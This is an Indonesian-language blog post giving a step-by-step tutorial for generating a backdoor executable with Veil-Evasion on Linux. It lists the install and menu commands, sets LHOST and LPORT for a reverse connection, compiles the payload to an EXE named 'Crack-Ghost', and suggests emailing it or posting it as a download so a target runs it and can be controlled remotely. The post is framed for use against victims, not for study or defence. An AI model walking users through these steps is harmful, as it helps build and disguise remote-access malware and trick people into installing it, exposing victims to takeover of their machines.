Cara Membuat Backdoor dengan Tools Veil-Evasion di Linux


hello guys bertemu dan bertemu lagi dengan saya Mr.Gagaltotal666
hahaha seperti biasa saya selalu aktif saat di malam hari :V
ok kali ini saya akan share cara membuat backdoor exploit dengan tools Veil-Evasion di linux
ikuti step by step nya

sebelum nya pasti kan anda sudah mempunyai Veil-Evasion nya
jika belum gampang kok jangan panik ^_^ , ikuti perintah ini :

" $ sudo apt-get install veil-evasion "

saya sarankan anda harus butuh internet cepat , kenapa ? karena ukuran file veil-evasion ini lumayan besar loh karena terdapat bermacam-macam exploit yang ada di dalam nya

bisa juga anda baca artikel saya sebelum nya disini :

cara install veil-evasion
http://gagaltotal666.blogspot.co.id/2016/07/cara-install-tools-veil-evasion-di-linux.html

jika sudah ada veil-evasion nya anda buka terminal dan ketikan :

" $ veil-evasion "

" $ [Menu>>] list " >> perintah ini untuk melihat bermacam-macam exploit



jika sudah muncul , pilih nomer " 6 "


selanjutnya masukan LHOST dan LPORT untuk isi backdoor
disini saya memakai IP localhost karena saya sedang menggunakan LAN
hanya untuk mempraktekan ke anda
kalau IP saat terhubung internet apakah bisa ? bisa kok dan backdoor hasil dari veil-evasion ini juga bisa beda jaringan loh anda bisa saja kirim lewat email dan taruh di link download biar supaya target kita mendownload nya dan bisa anda remote dari jauh
ok langsung saja masukan perintah ini :

" $ set LHOST 192.168.1.2 " >> masukan IP anda

" $ set LPORT 6666 " >> untuk Port bebas kok asalkan ada 4 digit angaka

" $ set COMPILE_TO_EXE Y " >> ini untuk hasil backdoor di kompile ke dalam setup.exe 

" $ generate "


selanjut nya nanti akan disuruh mengasih nama backdoor
disini saya akan mengasih nama nya : " Crack-Ghost "
terserah anda kok bebas


dan enter tunggu beberapa detik hasil akan muncul :


dan tara backdoor sudah terbuat , hasil dari backdoor nya berada ada di
file : " /var/lib/veil-evasion/output/compiled/ "

disini saya akan pindahkan file nya ke Desktop , tapi terserah anda untuk mempindahkan backdoor nya mau taruh dimana nya bebas kok
masukan perintah ini :

" $ mv (nama backdoor) /root/Desktop "  >> contoh

" $ mv Crack-Ghost.exe /root/Desktop " >> perintah mv ini fungsi nya untuk memindahkan file semacam Cut



Bagaimana cara menjalankan backdoor nya ?
gampang kok kita nanti akan menggunakan Metasploit atau disebut
" Msfconsole "  nanti saya lanjutkan artikel nya ya besok ^_^

ok sekian tips nya dari saya ^_^ semoga bermanfaat

Post a Comment

0 Comments